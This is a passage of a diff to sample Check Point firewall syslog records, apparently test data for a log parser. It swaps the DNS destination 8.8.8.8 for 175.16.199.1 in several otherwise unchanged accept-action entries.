service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51992"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33125"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33125"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.49.27.73"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42782"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43497"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43497"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x8,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.34"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54060"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36466"; service:"443"; service_id:"https"; 
src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41276"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x9,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50749"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xa,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34744"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x9,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50749"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xa,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34744"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xb,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58408"; service:"443"; service_id:"https"; 
src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xc,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54681"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xc,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54681"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xd,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"99.86.116.26"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36312"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x5,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"99.86.116.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50306"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.22"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38150"; service:"443"; service_id:"https"; 
src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.55.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58796"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"23.100.50.51"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36480"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48805"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40732"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
